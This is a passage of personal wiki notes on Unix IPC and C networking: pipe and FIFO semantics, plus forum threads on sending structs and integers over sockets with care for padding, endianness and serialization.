A pipe is created using __pipe(2)__, which creates a new pipe and returns** two file descriptors**, one referring to the read end of the pipe, the other referring to the write end. Pipes can be used to create a communication channel __between related processes__; see pipe(2) for an example.
|
||||
|
||||
A FIFO (short for First In First Out) __has a name within the file system__ (created using __mkfifo(3)__), and is opened using __open(2)__. Any process may open a FIFO, assuming the **file permissions** allow it. The read end is opened using the __O_RDONLY__ flag; the write end is opened using the __O_WRONLY__ flag. See fifo(7) for further details. Note: although FIFOs have a pathname in the file system, I/O on FIFOs does not involve operations on the underlying device (if there is one).
|
||||
|
||||
===== I/O on Pipes and FIFOs =====
|
||||
The only difference between pipes and FIFOs is the manner in which they are created and opened. Once these tasks have been accomplished, I/O on pipes and FIFOs has __exactly the same semantics__.
|
||||
|
||||
If a process attempts to read from an empty pipe, then __read(2) will block__ until **data is available (though not necessarily as many bytes as read asked for)**. If a process attempts to write to a full pipe (see below), then __write(2) blocks__ until sufficient data has been read from the pipe to allow the write to complete.
|
||||
The behavior above assumes that neither end of the pipe has been closed.
|
||||
|
||||
Nonblocking I/O is possible by using the __fcntl(2) F_SETFL__ operation to enable the __O_NONBLOCK__ open file status flag.
|
||||
|
||||
The communication channel provided by a pipe is__ a byte stream __: there is** no concept of message boundaries**.
|
||||
What travels through a pipe is a **byte stream**, not messages with boundaries.
|
||||
|
||||
If__ all file descriptors__ referring to the write end of a pipe have been closed, then an attempt to read(2) from the pipe will see__ end-of-file__ (read(2) will return 0). If all file descriptors referring to the read end of a pipe have been closed, then a write(2) will cause a __SIGPIPE __signal to be generated for the calling process. If the calling process is ignoring this signal, then write(2) fails with the __error EPIPE__.
|
||||
|
||||
An application that uses pipe(2) and fork(2) should use suitable close(2) calls __to close unnecessary duplicate file descriptors;__ this ensures that end-of-file and SIGPIPE/EPIPE are delivered when appropriate.
|
||||
|
||||
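It is important that the parent and the child __each close the file descriptors they do not need__. If the child does not close the write end fd[1], its read will never return EOF. Likewise, if the parent does not close the read end fd[0], its write will never get SIGPIPE/EPIPE. The same rule applies to network sockets: the parent should close the socket fd that the child uses.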
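The closing rule can be sketched as below. The function name pipe_roundtrip is hypothetical, and returning the byte count through the child's exit status is only a device to keep the example short (it assumes fewer than 256 bytes).

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical demo: the parent writes len bytes into a pipe, the child
 * reads until end-of-file and exits with the number of bytes it saw.
 * Returns the child's exit status, or -1 on error. */
int pipe_roundtrip(const char *msg, size_t len)
{
    int fd[2];
    pid_t pid;
    ssize_t written;
    int status = 0;

    if (pipe(fd) < 0)
        return -1;

    pid = fork();
    if (pid < 0) {
        close(fd[0]);
        close(fd[1]);
        return -1;
    }
    if (pid == 0) {
        char buf[64];
        ssize_t n;
        size_t total = 0;

        close(fd[1]);   /* child only reads; keeping this open would block EOF */
        while ((n = read(fd[0], buf, sizeof(buf))) > 0)
            total += (size_t)n;
        _exit((int)(total & 0xFF));
    }

    close(fd[0]);       /* parent only writes */
    written = write(fd[1], msg, len);
    close(fd[1]);       /* last write end closed: the child's read returns 0 */

    if (waitpid(pid, &status, 0) < 0 || written != (ssize_t)len)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

If the child skipped its close(fd[1]), its own copy of the write end would keep the pipe open and the read loop would never finish.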
|
||||
|
||||
It is not possible to apply lseek(2) to a pipe.
|
||||
|
||||
===== Pipe Capacity (determines whether write blocks) =====
|
||||
A pipe has a limited capacity. If the pipe is full, then a write(2) will block or fail, depending on whether the **O_NONBLOCK** flag is set (see below). Different implementations have different limits for the pipe capacity. Applications should not rely on a particular capacity: **an application should be designed so that a reading process consumes data as soon as it is available, so that a writing process does not remain blocked. **
|
||||
|
||||
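When the reading process consumes data slowly and the pipe is not yet full, write does not block, so **the reading process** __may get the data of several writes in a single read__ **(data in a pipe is a byte stream)**.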
|
||||
|
||||
In Linux versions before 2.6.11, the capacity of a pipe was the same as the system page size (e.g., 4096 bytes on i386). Since Linux 2.6.11, the pipe capacity is __65536 bytes__.
|
||||
|
||||
===== PIPE_BUF (determines whether a write is atomic; usually much smaller than the pipe capacity) =====
|
||||
POSIX.1-2001 says that __write(2)s of less than PIPE_BUF bytes must be atomic__: the output data is written to the pipe as a contiguous sequence. Writes of more than PIPE_BUF bytes may be nonatomic: the kernel may interleave the data with data written by other processes. POSIX.1-2001 requires PIPE_BUF to be at least __512 bytes__. (On Linux, PIPE_BUF is 4096 bytes.) The precise semantics depend on whether the file descriptor is nonblocking (O_NONBLOCK), whether there are multiple writers to the pipe, and on n, the number of bytes to be written:
|
||||
|
||||
* O_NONBLOCK disabled, n <= PIPE_BUF
|
||||
All n bytes are** written atomically**; write(2) **may block **if there is not room for n bytes to be written immediately
|
||||
* O_NONBLOCK enabled, n <= PIPE_BUF
|
||||
If there is room to write n bytes to the pipe, then write(2) succeeds immediately, writing all n bytes; otherwise write(2) fails, with errno set to__ EAGAIN__.
|
||||
* O_NONBLOCK disabled, n > PIPE_BUF
|
||||
The write is **nonatomic**: the data given to write(2) may be interleaved with write(2)s by other processes; the **write(2) blocks** until n bytes have been written.
|
||||
* O_NONBLOCK enabled, n > PIPE_BUF
|
||||
If the pipe is full, then write(2) fails, with errno set to__ EAGAIN__. Otherwise, from 1 to n bytes may be written (i.e., a "partial write" may occur; the caller should check the return value from write(2) to see **how many bytes** were actually written), and these bytes may be interleaved with writes by other processes.
|
||||
|
||||
A write being atomic means: __the bytes written will not be interleaved with data written by other processes__.
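The "O_NONBLOCK enabled, n <= PIPE_BUF" case can be observed with a sketch like the one below. The function name fill_pipe_nonblocking is hypothetical; the 512-byte chunk is chosen because POSIX guarantees PIPE_BUF is at least that large, so every write is all-or-nothing.

```c
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical demo: fill a fresh pipe with nonblocking 512-byte writes
 * until write fails. Returns the number of bytes the pipe accepted, or
 * -1 on setup error; *last_errno receives errno of the failing write. */
long fill_pipe_nonblocking(int *last_errno)
{
    int fd[2];
    int flags;
    long total = 0;
    char chunk[512];

    if (pipe(fd) < 0)
        return -1;

    flags = fcntl(fd[1], F_GETFL);
    if (flags < 0 || fcntl(fd[1], F_SETFL, flags | O_NONBLOCK) < 0) {
        close(fd[0]);
        close(fd[1]);
        return -1;
    }

    memset(chunk, 'x', sizeof(chunk));
    /* Nobody reads, so the pipe eventually fills up and write fails. */
    while (write(fd[1], chunk, sizeof(chunk)) == (ssize_t)sizeof(chunk))
        total += (long)sizeof(chunk);
    *last_errno = errno;

    close(fd[0]);
    close(fd[1]);
    return total;
}
```

The returned total reflects the pipe capacity of the running system, which is why applications should not hard-code it.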
|
||||
|
||||
|
||||
===== Open File Status Flags =====
|
||||
The only open file__ status flags __that can be meaningfully applied to a pipe or FIFO are **O_NONBLOCK and O_ASYNC**.
|
||||
|
||||
Setting the O_ASYNC flag for the read end of a pipe causes a signal (SIGIO by default) to be generated when new input becomes available on the pipe (see fcntl(2) for details). On Linux, O_ASYNC is supported for pipes and FIFOs only since kernel 2.6.
|
||||
|
||||
===== Portability notes =====
|
||||
On some systems (but not Linux), pipes are __bidirectional__: data can be transmitted in both directions between the pipe ends. According to POSIX.1-2001, pipes only need to be unidirectional. Portable applications should avoid reliance on bidirectional pipe semantics.
|
||||
109
Zim/Programme/APUE/send_struct_through_socket.txt
Normal file
@@ -0,0 +1,109 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T23:55:02+08:00
|
||||
|
||||
====== send struct through socket ======
|
||||
Created Saturday 04 June 2011
|
||||
|
||||
You can send it using the same send function without having another
|
||||
char buffer.
|
||||
since a is an object of your struct you need to give the address of
|
||||
it.
|
||||
i.e
|
||||
send(sd, (void*)&a, sizeof(a), 0); will resolve your issue.
|
||||
|
||||
One thing you've to notice while dealing with structure variables.
|
||||
|
||||
the size of the structure will be aligned according the pack size you
|
||||
are specifying. Normally the default alignment for the structure
|
||||
members will be 4 bytes in size.
|
||||
|
||||
i.e if you declare
|
||||
|
||||
struct MyStruct
|
||||
{
|
||||
int a;
|
||||
char buff[21]; // Oops, I meant 20 letters for the name and one extra byte for the null character
|
||||
};
|
||||
|
||||
You might be expecting a size 25 bytes for this structure but if you
|
||||
are giving alignment bytes 4, the size of the struct will be 28 bytes.
|
||||
(24 for buff and 4 for variable a)
|
||||
|
||||
As per your code you will be sending some extra bytes because of the
|
||||
alignment and you've to make sure that, at the client side too, you
|
||||
are having same structure alignment. else you may face some unexpected
|
||||
behavior.
|
||||
|
||||
You can specify the alignment using "#pragma pack" directive
|
||||
|
||||
#pragma pack(1) // alignment will be 1 byte; you will get the exact size of the members
#pragma pack(2) // alignment will be 2 bytes; members will be aligned to 2 bytes
#pragma pack(4) // alignment will be 4 bytes; members will be aligned to 4 bytes
#pragma pack(8) // alignment will be 8 bytes; members will be aligned to 8 bytes
|
||||
|
||||
Normally this will be set to the word length of the processor, i.e. 4
|
||||
bytes if you are using 32 bit architecture or 8 bytes if you are using
|
||||
64 bit architecture.
|
||||
and for strict size information we will use 1 byte alignment.
|
||||
|
||||
You can send any bytes you want. It's up to your send and recv code to
|
||||
deal with what the bytes mean. Note that you need the '&'
|
||||
|
||||
send(sd, (void*)&a, sizeof(a), 0);
|
||||
|
||||
|
||||
Of course, a structure object is just a contiguous memory buffer, the same as an array of char or anything else, so you can use the send() function to send the structure (memory).
|
||||
|
||||
|
||||
Just don't forget that different architectures have different endianness (little and big). So, when you receive a packet on the other side
|
||||
|
||||
recv(sd, (void*) &a, sizeof(a), 0);
|
||||
|
||||
the a.id maybe not 1(0x00000001), but (0x01000000)
|
||||
|
||||
Good Day
|
||||
--
|
||||
Alexander Pazdnikov
|
||||
|
||||
And if your struct has pointers to other types of data you must
|
||||
consider another way of sending your struct.
|
||||
|
||||
For ex.
|
||||
|
||||
struct tag_MyStruct {
|
||||
int a, b;
|
||||
fooStruct *pFoo;
|
||||
};
|
||||
|
||||
You will need to traverse those pointers and write the data to a
|
||||
single stream of bytes to send() the struct.
|
||||
|
||||
Sending raw struct's over the wire is a really bad idea, even between
|
||||
homogeneous systems.
|
||||
|
||||
Depending on the compiler used, different padding may be used.
|
||||
|
||||
So don't do that... for more advanced protocols ASN.1 is typically used,
|
||||
but for simpler applications, you can just define endian order of
|
||||
binary data, and pass each struct member along the wire.
|
||||
--------------
|
||||
Serialization
|
||||
|
||||
It is often necessary to send or receive complex datastructures to or from another program that may run on a different architecture or may have been designed for different version of the datastructures in question. A typical example is a program that saves its state to a file on exit and then reads it back when started.
|
||||
|
||||
The 'send' function will typically start by writing a magic identifier and version to the file or network socket and then proceed to write all the data members one by one (i.e. in serial). If variable length arrays are encountered (e.g. strings), it will either write a length followed by the data or it will write the data followed by a special terminator. The format is often XML or binary in which case the htonl() set of macros may come in handy.
|
||||
|
||||
The 'receive' function will be nearly identical: it will read all the items one by one. Variable length arrays are either handled by reading the count followed by the data, or by reading the data until the special terminator is reached.
|
||||
|
||||
Since these two functions often follow the same pattern as the declaration of the data(structures), it would be nice if they could all be generated from a common definition.
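A minimal sketch of such a 'send'/'receive' pair for the length-prefixed variant. Everything here is an assumption made for illustration: the struct person record, the function names and the wire layout (4-byte id, 2-byte name length, then the name bytes, integers in network byte order). A real format would typically also start with a magic identifier and a version, as described above.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical record used only for this example. */
struct person {
    uint32_t id;
    char name[21];       /* NUL-terminated */
};

/* Serialize *p into out (capacity cap). Returns bytes written, 0 if the
 * buffer is too small. No struct padding ever reaches the wire. */
size_t person_encode(const struct person *p, uint8_t *out, size_t cap)
{
    size_t name_len = strlen(p->name);
    size_t need = 4 + 2 + name_len;
    uint32_t id_be = htonl(p->id);
    uint16_t len_be = htons((uint16_t)name_len);

    if (need > cap)
        return 0;
    memcpy(out, &id_be, 4);
    memcpy(out + 4, &len_be, 2);
    memcpy(out + 6, p->name, name_len);
    return need;
}

/* Parse a buffer produced by person_encode. Returns 0 on success, -1 if
 * the input is truncated or the name does not fit. */
int person_decode(const uint8_t *in, size_t len, struct person *p)
{
    uint32_t id_be;
    uint16_t len_be;
    size_t name_len;

    if (len < 6)
        return -1;
    memcpy(&id_be, in, 4);
    memcpy(&len_be, in + 4, 2);
    name_len = ntohs(len_be);
    if (name_len >= sizeof(p->name) || 6 + name_len > len)
        return -1;
    p->id = ntohl(id_be);
    memcpy(p->name, in + 6, name_len);
    p->name[name_len] = '\0';
    return 0;
}
```

The decoder checks every length against the received size before copying, since the peer's data cannot be trusted.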
|
||||
|
||||
@@ -0,0 +1,102 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T23:57:14+08:00
|
||||
|
||||
====== Can I send a C struct to a socket ======
|
||||
Created Saturday 04 June 2011
|
||||
|
||||
I'm trying to send a struct to a DGRAM socket. Here's what i'm doing:
|
||||
|
||||
client (sends struct)
|
||||
|
||||
Code:
|
||||
|
||||
n = sendto(socket_fd,(const char*)&mypdu,sizeof(mypdu),0,
|
||||
(struct sockaddr *)&server_addr,sizeof(server_addr));
|
||||
|
||||
server
|
||||
|
||||
Code:
|
||||
|
||||
n=recvfrom(socket_fd,buffer,sizeof(mypdu),0,
|
||||
(struct sockaddr *)&from,&fromlen);
|
||||
|
||||
but in the client, i initialized one of the fields with 100, and in the server end, that field has the value 3 =\
|
||||
|
||||
Can I send the whole struct without sending it field by field?
|
||||
|
||||
|
||||
Re: Can I send a C struct to a socket?
|
||||
You will have to serialize the thing to send, and the receiver will need to reassemble the thing, very painful.
|
||||
__________________
|
||||
|
||||
|
||||
Re: Can I send a C struct to a socket?
|
||||
You shouldn't send a whole struct at a time, in fact you shouldn't even send integers (int) "as-is".
|
||||
__I would memcpy the struct into a buffer and send the buffer__
|
||||
The problem with structs is that depending on the compiler, on the OS, on the architecture, ... there are different padding conventions that apply.
|
||||
|
||||
|
||||
As an example:
|
||||
|
||||
Code:
|
||||
|
||||
struct Foo
|
||||
{
|
||||
char foo;
|
||||
int bar;
|
||||
};
|
||||
|
||||
sizeof(struct Foo) is not guaranteed to (and in real world will almost never) be equal to sizeof(char)+sizeof(int) due to those padding issues.
|
||||
|
||||
|
||||
Moreover, depending on the CPU architecture there are problems of endianness too (most or least significant byte first?).
|
||||
|
||||
|
||||
Re: Can I send a C struct to a socket?
|
||||
Listen to aks44.
|
||||
|
||||
I'll just add that, even if you use datatypes that you're sure all of your networked devices regard as the same bitsize (for example, I can't think of a current architecture that doesn't consider "char" to be 8 bits), same byte order (again, "char" and "unsigned char" relieve you of that worry), or padding, you absolutely, absolutely cannot send any "pointer" to another machine. For example, assume you have the following two struct definitions:
|
||||
|
||||
Code:
|
||||
|
||||
struct Something {
|
||||
char buf[8];
|
||||
};
|
||||
|
||||
struct SomethingPtr {
|
||||
struct Something *something;
|
||||
};
|
||||
|
||||
You can't do something like sending these two structs:
|
||||
|
||||
Code:
|
||||
|
||||
struct Something mySomething = {"text"};
|
||||
struct SomethingPtr mySomethingPtr = {&mySomething};
|
||||
|
||||
The mySomething address on one machine is going to be completely different on the other machine. You have to do something people often call "flattening the struct". You replace that pointer field with something that indicates to the other machine that it needs to reinsert a pointer to the mySomething struct you previously sent over.
|
||||
|
||||
You may want to take a look at how Microsoft's COM "marshalls" data between processes. There are examples of flattening structs there.
|
||||
Last edited by j_g; November 15th, 2007 at 06:33 PM..
|
||||
|
||||
|
||||
Re: Can I send a C struct to a socket?
|
||||
Quote:
|
||||
Originally Posted by kknd View Post
|
||||
You will have to serialize the thing to send, and the receiver will need to reassemble the thing, very painful.
|
||||
This is the correct way to do things, although I would not describe it as "painful". It's just another opportunity to code more.
|
||||
|
||||
Aks44 was also correct in that endianness is a factor. If you are transferring data from an Intel architecture to a PPC (power PC) architecture, then you will need to accommodate that the bytes in the words are swapped. M$'s .NET and CORBA handle this automagically. You can also do it yourself with minor effort.
|
||||
|
||||
Back to the serialize/unserialize procedure... you will need to perform a__ deep-copy of your structure into a buffer__, and if applicable, indicate the size of the buffer and sizes of any variable-length fields within the same buffer.
|
||||
|
||||
Once this buffer is sent across the wire, the recipient should be able to parse through the received buffer to reconstruct the original data structure.
|
||||
|
||||
Re: Can I send a C struct to a socket?
|
||||
this code is to work between Linux ix86 systems, so I don't think I have that sort of problems. I'm glad to say that it was fairly painless. My structure has mostly char* fields, one int (a cast to (const char*) did the trick), and I created a function to convert a list to a string, so I can send it in a buffer.
|
||||
|
||||
It's nice to have so many good responses in a relatively short amount of time, on a subject that has almost nothing, if anything at all, to do with Ubuntu
|
||||
|
||||
Thanks
|
||||
__________________
|
||||
56
Zim/Programme/APUE/send_struct_through_socket/Endianness.txt
Normal file
@@ -0,0 +1,56 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T00:18:26+08:00
|
||||
|
||||
====== Endianness ======
|
||||
Created Sunday 05 June 2011
|
||||
|
||||
Hi everyone,
|
||||
|
||||
I'm fighting with socket programming now and I've encountered a problem, which I don't know how to solve in a portable way. The task is simple : I need to send the array of 16 bytes over the network, receive it in a client application and parse it. I know, there are functions like htonl, htons and so one to use with uint16 and uint32. But what should I do with the chunks of data greater than that?
|
||||
|
||||
Thank you.
|
||||
|
||||
--------
|
||||
you say an array of 16 bytes. That doesn't really help. Endianness only matters for things larger than a byte
|
||||
|
||||
if its really raw bytes then just send them, you will receive them just the same
|
||||
|
||||
If it's really a struct you want to send
|
||||
|
||||
struct msg
|
||||
{
|
||||
int foo;
|
||||
int bar;
|
||||
.....
|
||||
|
||||
Then you need to work through the buffer pulling out the values you want.
|
||||
|
||||
When you send you must assemble a packet into a standard order
|
||||
|
||||
int off = 0;
|
||||
*(int*)&buff[off] = htonl(foo);
|
||||
off += sizeof(int);
|
||||
*(int*)&buff[off] = htonl(bar);
|
||||
...
|
||||
|
||||
when u receive
|
||||
|
||||
int foo = ntohl(*(int*)&buff[off]);
|
||||
off += sizeof(int);
|
||||
int bar = ntohl(*(int*)&buff[off]);
|
||||
....
|
||||
|
||||
edit : I see you want to send an IPv6 address, they are always in network byte order - so you can just stream it raw
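As an alternative sketch to the pointer casts above (which assume the buffer is suitably aligned for int), the bytes can be written and read one at a time. The function names put_u32_be and get_u32_be are hypothetical; this variant gives the same wire format on any host without needing htonl.

```c
#include <stdint.h>

/* Hypothetical helper: store v at buf[0..3], most significant byte first
 * (network byte order), regardless of the host's endianness. */
void put_u32_be(uint8_t *buf, uint32_t v)
{
    buf[0] = (uint8_t)(v >> 24);
    buf[1] = (uint8_t)(v >> 16);
    buf[2] = (uint8_t)(v >> 8);
    buf[3] = (uint8_t)v;
}

/* Hypothetical helper: read back a value stored by put_u32_be. */
uint32_t get_u32_be(const uint8_t *buf)
{
    return ((uint32_t)buf[0] << 24) |
           ((uint32_t)buf[1] << 16) |
           ((uint32_t)buf[2] << 8)  |
            (uint32_t)buf[3];
}
```

Packing two fields is then put_u32_be(buff + off, foo); off += 4; put_u32_be(buff + off, bar); and the receiver mirrors it with get_u32_be.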
|
||||
-----------------
|
||||
Endianness is a property of multibyte variables such as 16- and 32-bit integers; it has to do with whether the high-order or low-order byte goes first. If the client application is processing the array as individual bytes, it doesn't have to worry about endianness, as the order of the bits within the bytes is the same.
|
||||
|
||||
----------------
|
||||
htons, htonl, etc., are for dealing with a single data item (e.g. an int) that's larger than one byte. An array of bytes where each one is used as a single data item itself (e.g., a string) doesn't need to be translated between host and network byte order at all.
|
||||
|
||||
------------------
|
||||
Bytes themselves don't have endianness any more in that any single byte transmitted by a computer will have the same value in a different receiving computer. Endianness only has relevance these days to multibyte data types such as ints.
|
||||
|
||||
In your particular case it boils down to knowing what the receiver will do with your 16 bytes. If it will treat each of the 16 entries in the array as discrete single byte values then you can just send them without worrying about endianness. If, on the other hand, the receiver will treat your 16 byte array as four 32 bit integers then you'll need to run each integer through htonl() prior to sending.
|
||||
|
||||
Does that help?
|
||||
@@ -0,0 +1,40 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T00:09:05+08:00
|
||||
|
||||
====== How to send an integer through a socket ======
|
||||
Created Sunday 05 June 2011
|
||||
|
||||
I am trying to send an integer through a socket. I am using this code to do so; however, my C code will not compile. The compiler complains that myInt has not been declared.
|
||||
|
||||
int tmp = htonl(myInt);
|
||||
write(socket, &tmp, sizeof(tmp));
|
||||
|
||||
How do I declare myInt? Thanks.
|
||||
|
||||
------------
|
||||
Are you sure that it was properly declared in your program ?
|
||||
|
||||
Try like this:
|
||||
|
||||
int myInt = something;
|
||||
int tmp = htonl((uint32_t)myInt);
|
||||
write(socket, &tmp, sizeof(tmp));
|
||||
|
||||
-------------
|
||||
One simple solution is to __typecast the integer to char and send 4 bytes of the char buffer__
|
||||
|
||||
int myInt; char *ptr = (char *)&myInt; write(socket, ptr, sizeof(int));
|
||||
|
||||
at the receiving end read the 4 bytes.. u won't have any problem with the endianness.
|
||||
|
||||
|
||||
answered May 1 at 20:17
|
||||
maheshgupta024
|
||||
|
||||
|
||||
You certainly will have endian-ness problems if the two hosts are of different endian-ness. – Andrew Medico May 1 at 20:20
|
||||
|
||||
@maheshgupta024 - I think what you meant was to convert the integer to a textual representation (Such as you would see in XML or JSON). The problem is what you just posted ... doesn't do that. You'd need to use sprintf() for example to do the conversion. – Brian Roach May 1 at 20:36
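Putting the thread together, a hedged sketch of sending and receiving one integer in network byte order. The names send_u32 and recv_u32 are hypothetical; the loops are there because write and read on a socket may transfer fewer bytes than requested. An interrupted call (EINTR) is simply treated as an error here.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <unistd.h>

/* Hypothetical helper: send value as 4 bytes in network byte order.
 * Returns 0 on success, -1 on error. */
int send_u32(int fd, uint32_t value)
{
    uint32_t wire = htonl(value);
    const char *p = (const char *)&wire;
    size_t left = sizeof(wire);

    while (left > 0) {
        ssize_t n = write(fd, p, left);
        if (n <= 0)
            return -1;
        p += n;
        left -= (size_t)n;
    }
    return 0;
}

/* Hypothetical helper: receive 4 bytes and convert to host byte order.
 * Returns 0 on success, -1 on error or if the peer closed early. */
int recv_u32(int fd, uint32_t *value)
{
    uint32_t wire;
    char *p = (char *)&wire;
    size_t left = sizeof(wire);

    while (left > 0) {
        ssize_t n = read(fd, p, left);
        if (n <= 0)
            return -1;
        p += n;
        left -= (size_t)n;
    }
    *value = ntohl(wire);
    return 0;
}
```

Using uint32_t instead of int fixes the size of the value on the wire, which plain int does not guarantee.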
|
||||
@@ -0,0 +1,72 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T16:11:43+08:00
|
||||
|
||||
====== Send a struct over a socket with correct padding and endianness in C ======
|
||||
Created Sunday 05 June 2011
|
||||
|
||||
I have several structures defined to send over different Operating Systems (tcp networks). Defined structures are:
|
||||
|
||||
struct Struct1 { uint32_t num; char str[10]; char str2[10];};
|
||||
struct Struct2 { uint16_t num; char str[10];};
|
||||
|
||||
typedef Struct1 a;
|
||||
typedef Struct2 b;
|
||||
|
||||
The data is stored in a text file. Data Format is as such:
|
||||
|
||||
123
|
||||
Pie
|
||||
Crust
|
||||
|
||||
Struct1 a is stored as 3 separate parameters. However, struct2 is two separate parameters with both 2nd and 3rd line stored to the char str[] . The problem is when I write to a server over the multiple networks, the data is not received correctly. There are numerous spaces that separate the different parameters in the structures. How do I ensure proper sending and padding when I write to server? How do I store the data correctly (dynamic buffer or fixed buffer)?
|
||||
|
||||
Example of write: write(fd,&a, sizeof(typedef struct a)); Is this correct?
|
||||
|
||||
Problem Receive Side Output for struct2:
|
||||
|
||||
123( , )
|
||||
0 (, Pie)
|
||||
0 (Crust,)
|
||||
|
||||
Correct Output
|
||||
|
||||
123(Pie, Crust)
|
||||
------------------------
|
||||
write(fd,&a, sizeof(a)); is not correct; at least not portably, since the C compiler may introduce padding between the elements to ensure correct alignment. sizeof(typedef struct a) doesn't even make sense.
|
||||
|
||||
How you should send the data depends on the specs of your protocol. In particular, protocols define widely varying ways of sending strings. It is generally safest to send the struct members separately; either by multiple calls to write or writev(2). For instance, to send
|
||||
|
||||
struct { uint32_t a; uint16_t b; } foo;
|
||||
|
||||
over the network, where foo.a and foo.b already have the correct endianness, you would do something like:
|
||||
|
||||
struct iovec v[2];
|
||||
v[0].iov_base = &foo.a;
|
||||
v[0].iov_len = sizeof(uint32_t);
|
||||
v[1].iov_base = &foo.b;
|
||||
v[1].iov_len = sizeof(uint16_t);
|
||||
writev(fd, v, 2);
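A self-contained sketch of the same idea, including the byte-order conversion that the answer assumes has already happened. The function name send_foo is hypothetical.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/uio.h>

/* Hypothetical helper: send a 32-bit and a 16-bit field back to back in
 * network byte order with a single writev call. Exactly 6 bytes go out,
 * so any padding the compiler puts in a struct never reaches the wire.
 * Returns the number of bytes written, or -1 on error. */
ssize_t send_foo(int fd, uint32_t a, uint16_t b)
{
    uint32_t a_be = htonl(a);
    uint16_t b_be = htons(b);
    struct iovec v[2];

    v[0].iov_base = &a_be;
    v[0].iov_len = sizeof(a_be);
    v[1].iov_base = &b_be;
    v[1].iov_len = sizeof(b_be);
    return writev(fd, v, 2);
}
```

As with write, a stream socket may accept fewer bytes than requested, so production code would check the return value and resend the remainder.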
|
||||
|
||||
------------------
|
||||
|
||||
|
||||
|
||||
Sending structures over the network is tricky. You might run into the following problems:
|
||||
|
||||
1. Byte endianness issues with integers.
2. Padding introduced by your compiler.
3. String parsing (i.e. detecting string boundaries).
|
||||
|
||||
If performance is not your goal, I'd suggest creating encoders and decoders for each struct to be sent and received (ASN.1, XML or custom). If performance is really required you can still use structures and solve (1), by fixing an endianness (i.e. network byte order) and ensuring your integers are stored as such in those structures, and (2) by fixing a compiler and using the pragmas or attributes to enforce a "packed" structure.
|
||||
|
||||
GCC, for example, uses __attribute__((__packed__)) as such:
|
||||
|
||||
struct mystruct {
|
||||
uint32_t a;
|
||||
uint16_t b;
|
||||
unsigned char text[24];
|
||||
} __attribute__((__packed__));
|
||||
|
||||
(3) is not easy to solve. Using null terminated strings at a network protocol and depending on them being present would make your code vulnerable to several attacks. If strings need to be involved I'd use a proper encoding method such as the ones suggested above.
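To see what the packed attribute changes, a small sketch assuming GCC or Clang and a C11 compiler (for _Static_assert). The two struct names are hypothetical; the members are the ones from the example above.

```c
#include <stddef.h>
#include <stdint.h>

/* Same members twice: once with default layout, once packed. */
struct mystruct_padded {
    uint32_t a;
    uint16_t b;
    unsigned char text[24];
};

struct mystruct_packed {
    uint32_t a;
    uint16_t b;
    unsigned char text[24];
} __attribute__((__packed__));

/* Packed: exactly 4 + 2 + 24 bytes, text starts right after b. */
_Static_assert(sizeof(struct mystruct_packed) == 30,
               "packed layout must not contain padding");
_Static_assert(offsetof(struct mystruct_packed, text) == 6,
               "text follows b directly");
```

The default layout is typically rounded up to a multiple of 4 bytes on common platforms, which is exactly the kind of compiler-dependent detail that should not leak into a wire format.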
|
||||
----------------------
|
||||
@@ -0,0 +1,54 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T23:02:43+08:00
|
||||
|
||||
====== Sending Structured Data ======
|
||||
Created Saturday 04 June 2011
|
||||
Hey,
|
||||
I thought it was incredibly cool that I could send in a structure over using send(2) and not have to parse a single string in both my client and server. So I thought I'd share, as I saw someone was using strings and was asking about "\r\n", I'm sure it's not hard to figure out as we were sending over integers in our labs anyway.
|
||||
|
||||
Quote:
|
||||
|
||||
// Please note that I just wrote this here, it's not a part of my actual code – you may use this idea:
|
||||
|
||||
typedef struct Data {
|
||||
char message[140];
|
||||
int type;
|
||||
} Data;
|
||||
|
||||
/* You can use send(2) to send over a copy of your structure
|
||||
and receive it using recv(2): */
|
||||
|
||||
// send:
|
||||
Data data;
|
||||
sprintf(data.message, "Hello, I'm Nima");
|
||||
data.type = 0x01;
|
||||
|
||||
int sent = send(sock, &data, sizeof(Data), 0);
|
||||
|
||||
// recv:
|
||||
|
||||
Data data;
|
||||
memset(&data, 0, sizeof(Data));
|
||||
int recved = recv(sock, &data, sizeof(Data), 0);
|
||||
|
||||
I love C.
|
||||
|
||||
|
||||
« Last Edit: Dec 8th, 2010, 3:34am by Nimsical »
|
||||
|
||||
reid
|
||||
Global Moderator
|
||||
Instructor
|
||||
*****
|
||||
|
||||
|
||||
|
||||
|
||||
Posts: 933
|
||||
|
||||
Re: Sending Structured Data
|
||||
Reply #1 - Dec 8th, 2010, 9:49am
|
||||
Nice.
|
||||
|
||||
The problem with sending structured data is that you need to be careful about byte ordering. This will work fine as long as the two machines have the same byte order. I think it will work more generally if you convert the int to network byte order and back.
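A rough sketch of the byte-order conversion suggested above, assuming a POSIX system. It changes the original Data struct in one respect, using int32_t instead of int so both ends agree on the field width, and the helper names data_prepare and data_type are invented for this example.

```c
#include <arpa/inet.h>  /* htonl, ntohl */
#include <assert.h>
#include <stdint.h>
#include <string.h>

typedef struct Data {
    char message[140];
    int32_t type;   /* fixed width, unlike plain int */
} Data;

/* Hypothetical helper: build a record ready for send(sock, &d, sizeof d, 0). */
static void data_prepare(Data *out, const char *msg, int32_t type)
{
    assert(out != NULL && msg != NULL);
    memset(out, 0, sizeof *out);                          /* no stray bytes on the wire */
    strncpy(out->message, msg, sizeof out->message - 1);  /* always leaves a terminator */
    out->type = (int32_t)htonl((uint32_t)type);           /* host to network order */
}

/* Hypothetical helper: read the type field of a record filled by recv(). */
static int32_t data_type(const Data *in)
{
    assert(in != NULL);
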